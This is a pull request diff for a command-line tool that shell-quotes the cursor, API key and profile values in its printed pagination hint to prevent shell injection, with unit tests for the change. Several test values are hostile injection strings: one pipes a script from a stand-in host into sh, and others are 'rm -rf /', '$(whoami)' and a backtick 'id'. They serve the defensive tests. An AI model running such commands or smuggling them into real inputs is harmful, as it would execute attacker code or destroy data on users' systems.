### PR TITLE
fix: shell-escape dynamic values in pagination hint

### DIFF
--- a/src/lib/pagination.ts
+++ b/src/lib/pagination.ts
@@ -1,6 +1,7 @@
 import type { GlobalOpts } from './client';
 import { maskKey } from './config';
 import { outputError } from './output';
+import { shQuote } from './sh-quote';
 
 export function parseLimitOpt(raw: string, globalOpts: GlobalOpts): number {
   const limit = parseInt(raw, 10);
@@ -55,10 +56,12 @@ export function printPaginationHint(
     : list.data[list.data.length - 1].id;
   const flag = backward ? '--before' : '--after';
   const limitFlag = opts.limit ? ` --limit ${opts.limit}` : '';
-  const apiKeyFlag = opts.apiKey ? ` --api-key ${maskKey(opts.apiKey)}` : '';
-  const profileFlag = opts.profile ? ` --profile ${opts.profile}` : '';
+  const apiKeyFlag = opts.apiKey
+    ? ` --api-key ${shQuote(maskKey(opts.apiKey))}`
+    : '';
+  const profileFlag = opts.profile ? ` --profile ${shQuote(opts.profile)}` : '';
 
   console.log(
-    `\nFetch the next page:\n$ resend ${command} ${flag} ${cursor}${limitFlag}${apiKeyFlag}${profileFlag}`,
+    `\nFetch the next page:\n$ resend ${command} ${flag} ${shQuote(cursor)}${limitFlag}${apiKeyFlag}${profileFlag}`,
   );
 }

--- a/src/lib/sh-quote.ts
+++ b/src/lib/sh-quote.ts
@@ -1,0 +1,2 @@
+export const shQuote = (value: string): string =>
+  `'${value.replace(/'/g, "'\\''")}'`;

--- a/tests/lib/pagination.test.ts
+++ b/tests/lib/pagination.test.ts
@@ -102,7 +102,7 @@ describe('printPaginationHint', () => {
       {},
     );
     expect(logSpy).toHaveBeenCalledWith(
-      '\nFetch the next page:\n$ resend emails list --after item_3',
+      "\nFetch the next page:\n$ resend emails list --after 'item_3'",
     );
   });
 
@@ -116,7 +116,7 @@ describe('printPaginationHint', () => {
       { before: 'item_5' },
     );
     expect(logSpy).toHaveBeenCalledWith(
-      '\nFetch the next page:\n$ resend emails list --before item_1',
+      "\nFetch the next page:\n$ resend emails list --before 'item_1'",
     );
   });
 
@@ -127,7 +127,7 @@ describe('printPaginationHint', () => {
       { limit: 25 },
     );
     expect(logSpy).toHaveBeenCalledWith(
-      '\nFetch the next page:\n$ resend emails list --after item_1 --limit 25',
+      "\nFetch the next page:\n$ resend emails list --after 'item_1' --limit 25",
     );
   });
 
@@ -139,7 +139,7 @@ describe('printPaginationHint', () => {
     );
     const output = logSpy.mock.calls[0][0] as string;
     expect(output).not.toContain('re_1234567890abcdef');
-    expect(output).toContain('--api-key re_...cdef');
+    expect(output).toContain("--api-key 're_...cdef'");
   });
 
   test('includes --profile flag when profile is set', () => {
@@ -149,7 +149,7 @@ describe('printPaginationHint', () => {
       { profile: 'staging' },
     );
     expect(logSpy).toHaveBeenCalledWith(
-      '\nFetch the next page:\n$ resend emails list --after item_1 --profile staging',
+      "\nFetch the next page:\n$ resend emails list --after 'item_1' --profile 'staging'",
     );
   });
 
@@ -168,7 +168,30 @@ describe('printPaginationHint', () => {
       },
     );
     expect(logSpy).toHaveBeenCalledWith(
-      '\nFetch the next page:\n$ resend contacts list --before item_1 --limit 10 --api-key re_...ijkl --profile prod',
+      "\nFetch the next page:\n$ resend contacts list --before 'item_1' --limit 10 --api-key 're_...ijkl' --profile 'prod'",
     );
+  });
+
+  test('escapes shell metacharacters in profile', () => {
+    printPaginationHint(
+      { has_more: true, data: [{ id: 'item_1' }] },
+      'domains list',
+      { profile: 'prod; curl https://evil.invalid/p.sh | sh #' },
+    );
+    const output = logSpy.mock.calls[0][0] as string;
+    expect(output).toContain(
+      "--profile 'prod; curl https://evil.invalid/p.sh | sh #'",
+    );
+    expect(output).not.toContain('--profile prod;');
+  });
+
+  test('escapes single quotes in profile', () => {
+    printPaginationHint(
+      { has_more: true, data: [{ id: 'item_1' }] },
+      'domains list',
+      { profile: "it's" },
+    );
+    const output = logSpy.mock.calls[0][0] as string;
+    expect(output).toContain("--profile 'it'\\''s'");
   });
 });

--- a/tests/lib/sh-quote.test.ts
+++ b/tests/lib/sh-quote.test.ts
@@ -1,0 +1,32 @@
+import { describe, expect, it } from 'vitest';
+import { shQuote } from '../../src/lib/sh-quote';
+
+describe('shQuote', () => {
+  it('wraps a plain string in single quotes', () => {
+    expect(shQuote('hello')).toBe("'hello'");
+  });
+
+  it('escapes embedded single quotes', () => {
+    expect(shQuote("it's")).toBe("'it'\\''s'");
+  });
+
+  it('neutralises semicolons and pipes', () => {
+    expect(shQuote('a; rm -rf /')).toBe("'a; rm -rf /'");
+  });
+
+  it('neutralises subshell syntax', () => {
+    expect(shQuote('$(whoami)')).toBe("'$(whoami)'");
+  });
+
+  it('handles empty string', () => {
+    expect(shQuote('')).toBe("''");
+  });
+
+  it('handles backticks', () => {
+    expect(shQuote('`id`')).toBe("'`id`'");
+  });
+
+  it('handles multiple single quotes', () => {
+    expect(shQuote("a'b'c")).toBe("'a'\\''b'\\''c'");
+  });
+});


### PR DESCRIPTION

## Summary by cubic
Escapes dynamic values in the pagination hint using POSIX single-quote rules to prevent shell injection in copy-pasteable commands. Resolves BU-633 by safely quoting cursor, masked API key, and profile values.

- **Bug Fixes**
  - Added `shQuote` utility for POSIX single-quote escaping.
  - Applied quoting in `printPaginationHint` for cursor, `--api-key`, and `--profile`.
  - Updated tests to cover metacharacters and embedded quotes.

<sup>Written for commit 72af19df6b21c0182824152a228c67c55962a556. Summary will update on new commits.</sup>

<!-- End of auto-generated description by cubic. -->

